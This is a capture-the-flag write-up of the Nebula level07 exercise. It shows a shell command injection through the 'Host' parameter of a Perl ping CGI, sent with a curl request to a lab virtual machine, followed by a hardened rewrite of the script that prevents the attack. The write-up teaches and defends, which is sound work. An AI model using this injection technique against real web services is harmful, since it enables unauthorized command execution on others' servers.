Reachable from the web
Nebula 07 Agenda: “The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.”
“It was the Perl script, the one who swooned over the network flow.”

As usual, I started by investigating the target account’s home directory.
level07@nebula:/home/flag07$ ls -la
.........
-rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf

level07@nebula:/home/flag07$ cat ./thttpd.conf | less

# This file is for thttpd processes created by /etc/init.d/thttpd.
.........
# Specifies an alternate port number to listen on.
port=7007
.........
# Specifies a directory to chdir() to at startup. This is merely a convenience
# you could just as easily do a cd in the shell script that invokes the program.
dir=/home/flag07
.........
# Specifies a wildcard pattern for CGI programs, for instance "**.cgi" or
# "/cgi-bin/*". See thttpd(8) for details.
cgipat=**.cgi
.........
It appears that a thttpd server is running on port 7007 with the config taken from flag07’s home directory, which in turn means it will execute any *.cgi script found there.
level07@nebula:/home/flag07$ ps aux | grep http
flag07 1187 ......... /usr/sbin/thttpd -C /home/flag07/thttpd.conf
flag16 1189 ......... /usr/sbin/thttpd -C /home/flag16/thttpd.conf
Indeed! And it is not the only one =).
From the “index.cgi” source we can see that it takes the value of the “Host” parameter, passes it straight to the ping utility and prints the result. So let’s make the request with curl and use a shell separator to inject our favourite “getflag” command. Don’t forget about URL encoding.
$ curl --data-urlencode "Host=localhost;getflag" 192.168.1.3:7007/index.cgi
<html><head><title>Ping results</title></head><body><pre>PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_req=1 ttl=64 time=17.3 ms
64 bytes from localhost (127.0.0.1): icmp_req=2 ttl=64 time=17.2 ms
64 bytes from localhost (127.0.0.1): icmp_req=3 ttl=64 time=39.0 ms

--- localhost ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2012ms
rtt min/avg/max/mdev = 17.251/24.558/39.073/10.263 ms
You have successfully executed getflag on a target account
The last line of the output confirms that we reached our goal. By the way, “192.168.1.3” is the address of the Nebula virtual machine in my local network (use ifconfig to find out yours).
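The root cause here is that the Host value is handed to a shell inside a backtick/system call. A hardened rewrite of that CGI, added here as an example (it is not the level’s own index.cgi, and the helper names validated_host and ping_host are mine), keeps the same Host parameter and ping output but rejects anything that is not a hostname and runs ping without a shell at all:

```perl
#!/usr/bin/perl -T
# Hardened re-implementation of the level's index.cgi (added example, not the
# original Nebula script). Same contract: a "Host" parameter, ping output in <pre>.
use strict;
use warnings;
use CGI qw(param);

# Taint mode (-T) refuses to run external programs with an untrusted PATH.
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Allow-list the parameter: DNS labels separated by dots, nothing else.
# ";", "|", "`", "$", "&", whitespace etc. never get past this check, so a
# value such as "localhost;getflag" is rejected. The capture group also
# untaints the value, which -T requires before it may be passed to open().
sub validated_host {
    my ($raw) = @_;
    return undef unless defined $raw && length($raw) <= 253;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;
    return $raw =~ /\A($label(?:\.$label)*)\z/ ? $1 : undef;
}

# Run ping without a shell: the list form of open() execs /bin/ping directly,
# so $host is a single argv element and is never parsed for metacharacters.
# The output is HTML-escaped before being echoed back to the browser.
sub ping_host {
    my ($host) = @_;
    open(my $fh, '-|', '/bin/ping', '-c', '3', $host)
        or return "ping could not be started\n";
    my @out = <$fh>;
    close($fh);
    return CGI::escapeHTML(join('', @out));
}

print "Content-type: text/html\n\n";
print "<html><head><title>Ping results</title></head><body><pre>";
my $host = validated_host(param('Host'));
print defined $host ? ping_host($host) : "Invalid Host parameter\n";
print "</pre></body></html>\n";
```

With this version the curl request above gets “Invalid Host parameter” back, and even a value that slipped past the allow-list would reach ping as one argument rather than a shell command line.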
P.S. You could also make the request from a web browser or with wget, using an online URL encoder (or at least the Wikipedia percent-encoding table of reserved characters) as a helper to build a correctly encoded argument.